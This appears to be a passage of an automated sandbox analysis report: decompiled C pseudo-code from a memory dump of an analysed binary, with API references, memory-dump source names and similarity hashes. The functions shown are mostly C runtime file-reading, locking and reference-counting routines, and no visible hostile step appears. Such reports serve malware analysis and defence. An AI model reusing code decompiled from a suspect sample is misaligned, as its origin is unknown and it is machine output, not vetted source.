                                                                                                                                                                                                        						_t133 = _a20;
                                                                                                                                                                                                        						__eflags = _t133;
                                                                                                                                                                                                        						if(_t133 == 0) {
                                                                                                                                                                                                        							L9:
                                                                                                                                                                                                        							__eflags = _t119 - 0xffffffff;
                                                                                                                                                                                                        							if(_t119 != 0xffffffff) {
                                                                                                                                                                                                        								_t90 = E0040BA30(_t131, _t121, _t131, _t119);
                                                                                                                                                                                                        								_t134 = _t134 + 0xc;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t133 - _t131;
                                                                                                                                                                                                        							if(__eflags == 0) {
                                                                                                                                                                                                        								goto L3;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t94 = _t90 | 0xffffffff;
                                                                                                                                                                                                        								_t125 = _t94 % _a12;
                                                                                                                                                                                                        								__eflags = _a16 - _t94 / _a12;
                                                                                                                                                                                                        								if(__eflags > 0) {
                                                                                                                                                                                                        									goto L3;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								L13:
                                                                                                                                                                                                        								_t131 = _a12 * _a16;
                                                                                                                                                                                                        								__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                                                                                                                                                                        								_v20 = _t131;
                                                                                                                                                                                                        								_t120 = _t131;
                                                                                                                                                                                                        								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                                                                                                                                                                        									_v16 = 0x1000;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								__eflags = _t131;
                                                                                                                                                                                                        								if(_t131 == 0) {
                                                                                                                                                                                                        									L40:
                                                                                                                                                                                                        									return _a16;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									do {
                                                                                                                                                                                                        										__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                                                                                                                                                                        										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                                                                                                                                                                        											L24:
                                                                                                                                                                                                        											__eflags = _t120 - _v16;
                                                                                                                                                                                                        											if(_t120 < _v16) {
                                                                                                                                                                                                        												_t97 = E0040FC07(_t120, _t125, _t133);
                                                                                                                                                                                                        												__eflags = _t97 - 0xffffffff;
                                                                                                                                                                                                        												if(_t97 == 0xffffffff) {
                                                                                                                                                                                                        													L48:
                                                                                                                                                                                                        													return (_t131 - _t120) / _a12;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												__eflags = _v8;
                                                                                                                                                                                                        												if(_v8 == 0) {
                                                                                                                                                                                                        													L44:
                                                                                                                                                                                                        													__eflags = _a8 - 0xffffffff;
                                                                                                                                                                                                        													if(__eflags != 0) {
                                                                                                                                                                                                        														E0040BA30(_t131, _a4, 0, _a8);
                                                                                                                                                                                                        														_t134 = _t134 + 0xc;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        													 *((intOrPtr*)(E0040BFC1(__eflags))) = 0x22;
                                                                                                                                                                                                        													_push(0);
                                                                                                                                                                                                        													_push(0);
                                                                                                                                                                                                        													_push(0);
                                                                                                                                                                                                        													_push(0);
                                                                                                                                                                                                        													_push(0);
                                                                                                                                                                                                        													L4:
                                                                                                                                                                                                        													E0040E744(_t125, _t131, _t133);
                                                                                                                                                                                                        													goto L5;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_t123 = _v12;
                                                                                                                                                                                                        												_v12 = _v12 + 1;
                                                                                                                                                                                                        												 *_v12 = _t97;
                                                                                                                                                                                                        												_t120 = _t120 - 1;
                                                                                                                                                                                                        												_t70 =  &_v8;
                                                                                                                                                                                                        												 *_t70 = _v8 - 1;
                                                                                                                                                                                                        												__eflags =  *_t70;
                                                                                                                                                                                                        												_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                                                                                                                                                                        												goto L39;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags = _v16;
                                                                                                                                                                                                        											if(_v16 == 0) {
                                                                                                                                                                                                        												_t105 = 0x7fffffff;
                                                                                                                                                                                                        												__eflags = _t120 - 0x7fffffff;
                                                                                                                                                                                                        												if(_t120 <= 0x7fffffff) {
                                                                                                                                                                                                        													_t105 = _t120;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												__eflags = _t120 - 0x7fffffff;
                                                                                                                                                                                                        												if(_t120 <= 0x7fffffff) {
                                                                                                                                                                                                        													_t55 = _t120 % _v16;
                                                                                                                                                                                                        													__eflags = _t55;
                                                                                                                                                                                                        													_t125 = _t55;
                                                                                                                                                                                                        													_t110 = _t120;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t125 = 0x7fffffff % _v16;
                                                                                                                                                                                                        													_t110 = 0x7fffffff;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_t105 = _t110 - _t125;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags = _t105 - _v8;
                                                                                                                                                                                                        											if(_t105 > _v8) {
                                                                                                                                                                                                        												goto L44;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_push(_t105);
                                                                                                                                                                                                        												_push(_v12);
                                                                                                                                                                                                        												_t106 = E0040FA20(_t125, _t131, _t133);
                                                                                                                                                                                                        												_pop(_t123);
                                                                                                                                                                                                        												_push(_t106);
                                                                                                                                                                                                        												_t107 = E004102F4(_t120, _t125, _t131, _t133, __eflags);
                                                                                                                                                                                                        												_t134 = _t134 + 0xc;
                                                                                                                                                                                                        												__eflags = _t107;
                                                                                                                                                                                                        												if(_t107 == 0) {
                                                                                                                                                                                                        													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
                                                                                                                                                                                                        													goto L48;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												__eflags = _t107 - 0xffffffff;
                                                                                                                                                                                                        												if(_t107 == 0xffffffff) {
                                                                                                                                                                                                        													L47:
                                                                                                                                                                                                        													_t80 = _t133 + 0xc;
                                                                                                                                                                                                        													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
                                                                                                                                                                                                        													__eflags =  *_t80;
                                                                                                                                                                                                        													goto L48;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_v12 = _v12 + _t107;
                                                                                                                                                                                                        												_t120 = _t120 - _t107;
                                                                                                                                                                                                        												_v8 = _v8 - _t107;
                                                                                                                                                                                                        												goto L39;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t113 =  *(_t133 + 4);
                                                                                                                                                                                                        										__eflags = _t113;
                                                                                                                                                                                                        										if(__eflags == 0) {
                                                                                                                                                                                                        											goto L24;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										if(__eflags < 0) {
                                                                                                                                                                                                        											goto L47;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t131 = _t120;
                                                                                                                                                                                                        										__eflags = _t120 - _t113;
                                                                                                                                                                                                        										if(_t120 >= _t113) {
                                                                                                                                                                                                        											_t131 = _t113;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags = _t131 - _v8;
                                                                                                                                                                                                        										if(_t131 > _v8) {
                                                                                                                                                                                                        											_t133 = 0;
                                                                                                                                                                                                        											__eflags = _a8 - 0xffffffff;
                                                                                                                                                                                                        											if(__eflags != 0) {
                                                                                                                                                                                                        												E0040BA30(_t131, _a4, 0, _a8);
                                                                                                                                                                                                        												_t134 = _t134 + 0xc;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t114 = E0040BFC1(__eflags);
                                                                                                                                                                                                        											_push(_t133);
                                                                                                                                                                                                        											_push(_t133);
                                                                                                                                                                                                        											_push(_t133);
                                                                                                                                                                                                        											_push(_t133);
                                                                                                                                                                                                        											 *_t114 = 0x22;
                                                                                                                                                                                                        											_push(_t133);
                                                                                                                                                                                                        											goto L4;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											E004103F1(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
                                                                                                                                                                                                        											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
                                                                                                                                                                                                        											 *_t133 =  *_t133 + _t131;
                                                                                                                                                                                                        											_v12 = _v12 + _t131;
                                                                                                                                                                                                        											_t120 = _t120 - _t131;
                                                                                                                                                                                                        											_t134 = _t134 + 0x10;
                                                                                                                                                                                                        											_v8 = _v8 - _t131;
                                                                                                                                                                                                        											_t131 = _v20;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										L39:
                                                                                                                                                                                                        										__eflags = _t120;
                                                                                                                                                                                                        									} while (_t120 != 0);
                                                                                                                                                                                                        									goto L40;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t118 = _t90 | 0xffffffff;
                                                                                                                                                                                                        						_t90 = _t118 / _a12;
                                                                                                                                                                                                        						_t125 = _t118 % _a12;
                                                                                                                                                                                                        						__eflags = _a16 - _t90;
                                                                                                                                                                                                        						if(_a16 <= _t90) {
                                                                                                                                                                                                        							goto L13;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L3:
                                                                                                                                                                                                        					_t92 = E0040BFC1(_t138);
                                                                                                                                                                                                        					_push(_t131);
                                                                                                                                                                                                        					_push(_t131);
                                                                                                                                                                                                        					_push(_t131);
                                                                                                                                                                                                        					_push(_t131);
                                                                                                                                                                                                        					 *_t92 = 0x16;
                                                                                                                                                                                                        					_push(_t131);
                                                                                                                                                                                                        					goto L4;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}





























                                                                                                                                                                                                        0x0040bd2e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bd30
                                                                                                                                                                                                        0x0040bd30
                                                                                                                                                                                                        0x0040bd35
                                                                                                                                                                                                        0x0040bd38
                                                                                                                                                                                                        0x0040bd3b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bd3d
                                                                                                                                                                                                        0x0040bd40
                                                                                                                                                                                                        0x0040bd44
                                                                                                                                                                                                        0x0040bd4b
                                                                                                                                                                                                        0x0040bd4e
                                                                                                                                                                                                        0x0040bd50
                                                                                                                                                                                                        0x0040bd5a
                                                                                                                                                                                                        0x0040bd52
                                                                                                                                                                                                        0x0040bd55
                                                                                                                                                                                                        0x0040bd55
                                                                                                                                                                                                        0x0040bd61
                                                                                                                                                                                                        0x0040bd63
                                                                                                                                                                                                        0x0040be53
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bd69
                                                                                                                                                                                                        0x0040bd69
                                                                                                                                                                                                        0x0040bd69
                                                                                                                                                                                                        0x0040bd70
                                                                                                                                                                                                        0x0040bdb6
                                                                                                                                                                                                        0x0040bdb6
                                                                                                                                                                                                        0x0040bdb9
                                                                                                                                                                                                        0x0040be24
                                                                                                                                                                                                        0x0040be2a
                                                                                                                                                                                                        0x0040be2d
                                                                                                                                                                                                        0x0040beb8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bebe
                                                                                                                                                                                                        0x0040be33
                                                                                                                                                                                                        0x0040be37
                                                                                                                                                                                                        0x0040be87
                                                                                                                                                                                                        0x0040be87
                                                                                                                                                                                                        0x0040be8b
                                                                                                                                                                                                        0x0040be95
                                                                                                                                                                                                        0x0040be9a
                                                                                                                                                                                                        0x0040be9a
                                                                                                                                                                                                        0x0040bea2
                                                                                                                                                                                                        0x0040beaa
                                                                                                                                                                                                        0x0040beab
                                                                                                                                                                                                        0x0040beac
                                                                                                                                                                                                        0x0040bead
                                                                                                                                                                                                        0x0040beae
                                                                                                                                                                                                        0x0040bcf9
                                                                                                                                                                                                        0x0040bcf9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bcfe
                                                                                                                                                                                                        0x0040be39
                                                                                                                                                                                                        0x0040be3c
                                                                                                                                                                                                        0x0040be3f
                                                                                                                                                                                                        0x0040be44
                                                                                                                                                                                                        0x0040be45
                                                                                                                                                                                                        0x0040be45
                                                                                                                                                                                                        0x0040be45
                                                                                                                                                                                                        0x0040be48
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040be48
                                                                                                                                                                                                        0x0040bdbb
                                                                                                                                                                                                        0x0040bdbf
                                                                                                                                                                                                        0x0040bde0
                                                                                                                                                                                                        0x0040bde5
                                                                                                                                                                                                        0x0040bde7
                                                                                                                                                                                                        0x0040bde9
                                                                                                                                                                                                        0x0040bde9
                                                                                                                                                                                                        0x0040bdc1
                                                                                                                                                                                                        0x0040bdc8
                                                                                                                                                                                                        0x0040bdca
                                                                                                                                                                                                        0x0040bdd7
                                                                                                                                                                                                        0x0040bdd7
                                                                                                                                                                                                        0x0040bdd7
                                                                                                                                                                                                        0x0040bdda
                                                                                                                                                                                                        0x0040bdcc
                                                                                                                                                                                                        0x0040bdce
                                                                                                                                                                                                        0x0040bdd1
                                                                                                                                                                                                        0x0040bdd1
                                                                                                                                                                                                        0x0040bddc
                                                                                                                                                                                                        0x0040bddc
                                                                                                                                                                                                        0x0040bdeb
                                                                                                                                                                                                        0x0040bdee
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bdf4
                                                                                                                                                                                                        0x0040bdf4
                                                                                                                                                                                                        0x0040bdf5
                                                                                                                                                                                                        0x0040bdf9
                                                                                                                                                                                                        0x0040bdfe
                                                                                                                                                                                                        0x0040bdff
                                                                                                                                                                                                        0x0040be00
                                                                                                                                                                                                        0x0040be05
                                                                                                                                                                                                        0x0040be08
                                                                                                                                                                                                        0x0040be0a
                                                                                                                                                                                                        0x0040bec6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bec6
                                                                                                                                                                                                        0x0040be10
                                                                                                                                                                                                        0x0040be13
                                                                                                                                                                                                        0x0040beb4
                                                                                                                                                                                                        0x0040beb4
                                                                                                                                                                                                        0x0040beb4
                                                                                                                                                                                                        0x0040beb4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040beb4
                                                                                                                                                                                                        0x0040be19
                                                                                                                                                                                                        0x0040be1c
                                                                                                                                                                                                        0x0040be1e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040be1e
                                                                                                                                                                                                        0x0040bdee
                                                                                                                                                                                                        0x0040bd72
                                                                                                                                                                                                        0x0040bd75
                                                                                                                                                                                                        0x0040bd77
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bd79
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bd7f
                                                                                                                                                                                                        0x0040bd81
                                                                                                                                                                                                        0x0040bd83
                                                                                                                                                                                                        0x0040bd85
                                                                                                                                                                                                        0x0040bd85
                                                                                                                                                                                                        0x0040bd87
                                                                                                                                                                                                        0x0040bd8a
                                                                                                                                                                                                        0x0040be5b
                                                                                                                                                                                                        0x0040be5d
                                                                                                                                                                                                        0x0040be61

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3886058894-0
                                                                                                                                                                                                        • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                                                        • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 90%
                                                                                                                                                                                                        			E00414738(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                                                        				intOrPtr _t28;
                                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t30 = __eflags;
                                                                                                                                                                                                        				_t26 = __edi;
                                                                                                                                                                                                        				_t25 = __edx;
                                                                                                                                                                                                        				_t22 = __ebx;
                                                                                                                                                                                                        				_push(0xc);
                                                                                                                                                                                                        				_push(0x4214d0);
                                                                                                                                                                                                        				E0040E1D8(__ebx, __edi, __esi);
                                                                                                                                                                                                        				_t28 = E00410735(__ebx, __edx, __edi, _t30);
                                                                                                                                                                                                        				_t13 =  *0x422e34; // 0xfffffffe
                                                                                                                                                                                                        				if(( *(_t28 + 0x70) & _t13) == 0) {
                                                                                                                                                                                                        					L6:
                                                                                                                                                                                                        					E0040D6E0(_t22, 0xc);
                                                                                                                                                                                                        					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                                                                                                                                                                                                        					_t8 = _t28 + 0x6c; // 0x6c
                                                                                                                                                                                                        					_t26 =  *0x422f18; // 0x422e40
                                                                                                                                                                                                        					 *((intOrPtr*)(_t29 - 0x1c)) = E004146FA(_t8, _t26);
                                                                                                                                                                                                        					 *(_t29 - 4) = 0xfffffffe;
                                                                                                                                                                                                        					E004147A2();
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                                                                                                                                                                                                        					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                                                                                                                                                                        						goto L6;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t28 =  *((intOrPtr*)(E00410735(_t22, __edx, _t26, _t32) + 0x6c));
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t28 == 0) {
                                                                                                                                                                                                        					E0040E79A(_t25, _t26, 0x20);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E0040E21D(_t28);
                                                                                                                                                                                                        			}








                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • __getptd.LIBCMT ref: 00414744
                                                                                                                                                                                                          • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                                                                          • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                                                                                        • __getptd.LIBCMT ref: 0041475B
                                                                                                                                                                                                        • __amsg_exit.LIBCMT ref: 00414769
                                                                                                                                                                                                        • __lock.LIBCMT ref: 00414779
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                                                        • String ID: @.B
                                                                                                                                                                                                        • API String ID: 3521780317-470711618
                                                                                                                                                                                                        • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                                                        • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 77%
                                                                                                                                                                                                        			E0040C73D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                                                        				void* _t16;
                                                                                                                                                                                                        				void* _t17;
                                                                                                                                                                                                        				intOrPtr _t19;
                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                        				signed int _t22;
                                                                                                                                                                                                        				intOrPtr* _t27;
                                                                                                                                                                                                        				intOrPtr _t39;
                                                                                                                                                                                                        				intOrPtr _t40;
                                                                                                                                                                                                        				intOrPtr _t50;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t37 = __edx;
                                                                                                                                                                                                        				_push(8);
                                                                                                                                                                                                        				_push(0x421140);
                                                                                                                                                                                                        				E0040E1D8(__ebx, __edi, __esi);
                                                                                                                                                                                                        				_t39 = _a4;
                                                                                                                                                                                                        				_t50 = _t39;
                                                                                                                                                                                                        				_t51 = _t50 != 0;
                                                                                                                                                                                                        				if(_t50 != 0) {
                                                                                                                                                                                                        					E0040FB29(_t39);
                                                                                                                                                                                                        					_v8 = 0;
                                                                                                                                                                                                        					 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0xffffffcf;
                                                                                                                                                                                                        					_t16 = E0040FA20(__edx, _t39, _t39);
                                                                                                                                                                                                        					__eflags = _t16 - 0xffffffff;
                                                                                                                                                                                                        					if(_t16 == 0xffffffff) {
                                                                                                                                                                                                        						L6:
                                                                                                                                                                                                        						_t17 = 0x4227e0;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t21 = E0040FA20(__edx, _t39, _t39);
                                                                                                                                                                                                        						__eflags = _t21 - 0xfffffffe;
                                                                                                                                                                                                        						if(_t21 == 0xfffffffe) {
                                                                                                                                                                                                        							goto L6;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t22 = E0040FA20(__edx, _t39, _t39);
                                                                                                                                                                                                        							_t17 = ((E0040FA20(_t37, _t39, _t39) & 0x0000001f) << 6) +  *((intOrPtr*)(0x423f60 + (_t22 >> 5) * 4));
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t9 = _t17 + 4; // 0xa80
                                                                                                                                                                                                        					 *(_t17 + 4) =  *_t9 & 0x000000fd;
                                                                                                                                                                                                        					_v8 = 0xfffffffe;
                                                                                                                                                                                                        					E0040C735(_t39);
                                                                                                                                                                                                        					_t19 = 0;
                                                                                                                                                                                                        					__eflags = 0;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t27 = E0040BFC1(_t51);
                                                                                                                                                                                                        					_t40 = 0x16;
                                                                                                                                                                                                        					 *_t27 = _t40;
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					E0040E744(__edx, _t40, 0);
                                                                                                                                                                                                        					_t19 = _t40;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E0040E21D(_t19);
                                                                                                                                                                                                        			}














                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • __lock_file.LIBCMT ref: 0040C6C8
                                                                                                                                                                                                        • __fileno.LIBCMT ref: 0040C6D6
                                                                                                                                                                                                        • __fileno.LIBCMT ref: 0040C6E2
                                                                                                                                                                                                        • __fileno.LIBCMT ref: 0040C6EE
                                                                                                                                                                                                        • __fileno.LIBCMT ref: 0040C6FE
                                                                                                                                                                                                          • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                                                          • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.401764735.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.401764735.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2805327698-0
                                                                                                                                                                                                        • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                                                        • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 89%
                                                                                                                                                                                                        			E00413FCC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                                                        				LONG* _t21;
                                                                                                                                                                                                        				long _t23;
                                                                                                                                                                                                        				void* _t31;
                                                                                                                                                                                                        				LONG* _t33;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        				void* _t35;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t35 = __eflags;
                                                                                                                                                                                                        				_t29 = __edx;
                                                                                                                                                                                                        				_t25 = __ebx;
                                                                                                                                                                                                        				_push(0xc);
                                                                                                                                                                                                        				_push(0x421490);
                                                                                                                                                                                                        				E0040E1D8(__ebx, __edi, __esi);
                                                                                                                                                                                                        				_t31 = E00410735(__ebx, __edx, __edi, _t35);
                                                                                                                                                                                                        				_t15 =  *0x422e34; // 0xfffffffe
                                                                                                                                                                                                        				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                                                                                                                                                        					E0040D6E0(_t25, 0xd);
                                                                                                                                                                                                        					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                                                                                                                                                        					_t33 =  *(_t31 + 0x68);
                                                                                                                                                                                                        					 *(_t34 - 0x1c) = _t33;
                                                                                                                                                                                                        					__eflags = _t33 -  *0x422d38; // 0x21a1638
                                                                                                                                                                                                        					if(__eflags != 0) {
                                                                                                                                                                                                        						__eflags = _t33;
                                                                                                                                                                                                        						if(_t33 != 0) {
                                                                                                                                                                                                        							_t23 = InterlockedDecrement(_t33);
                                                                                                                                                                                                        							__eflags = _t23;
                                                                                                                                                                                                        							if(_t23 == 0) {
                                                                                                                                                                                                        								__eflags = _t33 - 0x422910;
                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                        									_push(_t33);
                                                                                                                                                                                                        									E0040B6B5(_t25, _t31, _t33, __eflags);
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t21 =  *0x422d38; // 0x21a1638
                                                                                                                                                                                                        						 *(_t31 + 0x68) = _t21;
                                                                                                                                                                                                        						_t33 =  *0x422d38; // 0x21a1638
                                                                                                                                                                                                        						 *(_t34 - 0x1c) = _t33;
                                                                                                                                                                                                        						InterlockedIncrement(_t33);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *(_t34 - 4) = 0xfffffffe;
                                                                                                                                                                                                        					E00414067();
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t33 =  *(_t31 + 0x68);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t33 == 0) {
                                                                                                                                                                                                        					E0040E79A(_t29, _t31, 0x20);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E0040E21D(_t33);
                                                                                                                                                                                                        			}











                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • __getptd.LIBCMT ref: 00413FD8
                                                                                                                                                                                                          • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                                                                          • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                                                                                        • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                                                                                                                                        • __lock.LIBCMT ref: 00414008
                                                                                                                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                                                                                                                                                        • InterlockedIncrement.KERNEL32(021A1638), ref: 00414050
                                                                                                                                                                                                        Memory Dump Source
